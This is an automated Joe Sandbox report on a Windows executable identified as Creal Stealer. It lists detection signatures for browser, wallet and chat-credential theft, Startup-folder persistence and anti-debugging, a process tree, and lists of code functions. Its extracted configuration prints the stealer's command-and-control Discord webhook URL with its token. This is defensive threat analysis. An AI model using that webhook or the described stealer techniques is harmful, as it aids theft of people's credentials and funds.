Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HyZh4pn0RF.exe

Overview

General Information

Sample name:HyZh4pn0RF.exe
renamed because original name is a hash value
Original sample name:52c7c34bcc42c907a275f706cde7c03eab24287f3aec081f0bd88780de131e7c.exe
Analysis ID:1520701
MD5:a4fd5040db03f0c04306ab7824320269
SHA1:32a4e4f1c7d0c0fe1be81bddecafeb2303a8227b
SHA256:52c7c34bcc42c907a275f706cde7c03eab24287f3aec081f0bd88780de131e7c
Tags:exeuser-JaffaCakes118
Infos:

Detection

Creal Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Creal Stealer
AI detected suspicious sample
Drops PE files to the startup folder
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal communication platform credentials (via file / registry access)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • HyZh4pn0RF.exe (PID: 344 cmdline: "C:\Users\user\Desktop\HyZh4pn0RF.exe" MD5: A4FD5040DB03F0C04306AB7824320269)
    • HyZh4pn0RF.exe (PID: 4040 cmdline: "C:\Users\user\Desktop\HyZh4pn0RF.exe" MD5: A4FD5040DB03F0C04306AB7824320269)
      • cmd.exe (PID: 3276 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3032 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
  • HyZh4pn0RF.exe (PID: 5652 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe" MD5: A4FD5040DB03F0C04306AB7824320269)
    • HyZh4pn0RF.exe (PID: 5340 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe" MD5: A4FD5040DB03F0C04306AB7824320269)
      • cmd.exe (PID: 4824 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 4528 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0Rz"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CrealStealerYara detected Creal StealerJoe Security
    0000000A.00000002.2012652158.000001F3E3C00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CrealStealerYara detected Creal StealerJoe Security
      0000000A.00000003.1959532011.000001F3E36D7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CrealStealerYara detected Creal StealerJoe Security
        0000000A.00000003.1958967533.000001F3E36A0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CrealStealerYara detected Creal StealerJoe Security
          00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CrealStealerYara detected Creal StealerJoe Security
            Click to see the 6 entries
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\HyZh4pn0RF.exe, ProcessId: 4040, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: HyZh4pn0RF.exeAvira: detected
            Source: HyZh4pn0RF.exe.4040.2.memstrminMalware Configuration Extractor: Creal Stealer {"C2 url": "https://discord.com/api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0Rz"}
            Source: HyZh4pn0RF.exeReversingLabs: Detection: 50%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: HyZh4pn0RF.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: geolocation-db.com
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB72CB40 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,2_2_00007FFBAB72CB40
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB758A90 CRYPTO_malloc,ERR_new,ERR_set_debug,2_2_00007FFBAB758A90
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB758810 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,2_2_00007FFBAB758810
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB744C28 EVP_MAC_CTX_free,CRYPTO_free,2_2_00007FFBAB744C28
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB766C40 CRYPTO_realloc,2_2_00007FFBAB766C40
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB7111A9 EVP_MAC_CTX_free,CRYPTO_free,2_2_00007FFBAB7111A9
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB712464 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FFBAB712464
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB711F87 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,2_2_00007FFBAB711F87
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB714BD0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,2_2_00007FFBAB714BD0
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB72EC00 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,2_2_00007FFBAB72EC00
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB752C10 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,2_2_00007FFBAB752C10
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB71213F EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,2_2_00007FFBAB71213F
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB73EB40 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,memcpy,2_2_00007FFBAB73EB40
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB71110E EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,2_2_00007FFBAB71110E
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB714B10 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,2_2_00007FFBAB714B10
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB711A32 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,2_2_00007FFBAB711A32
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB7120E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FFBAB7120E0
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB71117C _time64,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,2_2_00007FFBAB71117C
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB712365 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,2_2_00007FFBAB712365
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB7117F8 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FFBAB7117F8
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB77A930 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,2_2_00007FFBAB77A930
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB72E948 CRYPTO_free,2_2_00007FFBAB72E948
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB711811 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,2_2_00007FFBAB711811
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB724980 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_snprintf,2_2_00007FFBAB724980
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB726990 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_CIPHER_fetch,EVP_CIPHER_get_flags,2_2_00007FFBAB726990
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB7113DE EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FFBAB7113DE
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB711181 CRYPTO_free,CRYPTO_free,CRYPTO_free,2_2_00007FFBAB711181
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB711A41 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FFBAB711A41
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB711A05 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,_time64,X509_free,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,2_2_00007FFBAB711A05
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB711B90 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,2_2_00007FFBAB711B90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB776244 CRYPTO_memcmp,10_2_00007FFBBB776244
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7718E0 _Py_NoneStruct,_PyArg_UnpackKeywords,PyObject_GetBuffer,PyBuffer_IsContiguous,PyObject_GetBuffer,PyBuffer_IsContiguous,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,EVP_PBE_scrypt,PyBytes_FromStringAndSize,PyEval_SaveThread,EVP_PBE_scrypt,PyEval_RestoreThread,PyExc_ValueError,PyErr_SetString,PyBuffer_Release,PyBuffer_Release,PyLong_AsLong,PyErr_Occurred,PyLong_AsLong,PyErr_Occurred,PyExc_ValueError,PyExc_ValueError,PyErr_Format,_PyArg_BadArgument,_PyArg_BadArgument,_PyArg_BadArgument,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,_PyArg_BadArgument,_PyArg_BadArgument,PyExc_OverflowError,PyExc_OverflowError,_Py_Dealloc,PyExc_ValueError,10_2_00007FFBBB7718E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB83CB40 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,10_2_00007FFBBB83CB40
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB868810 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,10_2_00007FFBBB868810
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821361 CRYPTO_malloc,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,ERR_pop_to_mark,CRYPTO_free,EVP_PKEY_free,10_2_00007FFBBB821361
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB825C53 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_set_data,BIO_clear_flags,10_2_00007FFBBB825C53
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB82222A ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,10_2_00007FFBBB82222A
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB8223E7 CRYPTO_free,CRYPTO_memdup,10_2_00007FFBBB8223E7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB82267B CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,10_2_00007FFBBB82267B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB82150F OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_VERIFY_PARAM_get_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,10_2_00007FFBBB82150F
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821CEE CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,10_2_00007FFBBB821CEE
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB833B30 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,10_2_00007FFBBB833B30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB88BB70 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,10_2_00007FFBBB88BB70
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB86DB60 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,10_2_00007FFBBB86DB60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821C53 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,10_2_00007FFBBB821C53
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB8213D9 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,10_2_00007FFBBB8213D9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB8223EC CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,10_2_00007FFBBB8223EC
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB86DAF0 CRYPTO_free,10_2_00007FFBBB86DAF0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB845AE0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,10_2_00007FFBBB845AE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB885B10 EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,10_2_00007FFBBB885B10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB835B10 COMP_zlib,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,10_2_00007FFBBB835B10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB82271B CRYPTO_free,CRYPTO_strdup,10_2_00007FFBBB82271B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB846758 CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_clear_free,OPENSSL_LH_num_items,OPENSSL_LH_num_items,ERR_peek_error,10_2_00007FFBBB846758
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB877A40 CRYPTO_free,CRYPTO_free,CRYPTO_free,10_2_00007FFBBB877A40
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB846758 CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_clear_free,OPENSSL_LH_num_items,OPENSSL_LH_num_items,ERR_peek_error,10_2_00007FFBBB846758
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB82204A CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,10_2_00007FFBBB82204A
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB8459F0 CRYPTO_free,CRYPTO_free,10_2_00007FFBBB8459F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB835A10 OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,10_2_00007FFBBB835A10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821A16 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,10_2_00007FFBBB821A16
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821D84 CRYPTO_free,CRYPTO_memdup,10_2_00007FFBBB821D84
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB82107D CRYPTO_free,10_2_00007FFBBB82107D
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB837980 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free,10_2_00007FFBBB837980
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB8838A0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,10_2_00007FFBBB8838A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB822590 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,10_2_00007FFBBB822590
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821B18 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,10_2_00007FFBBB821B18
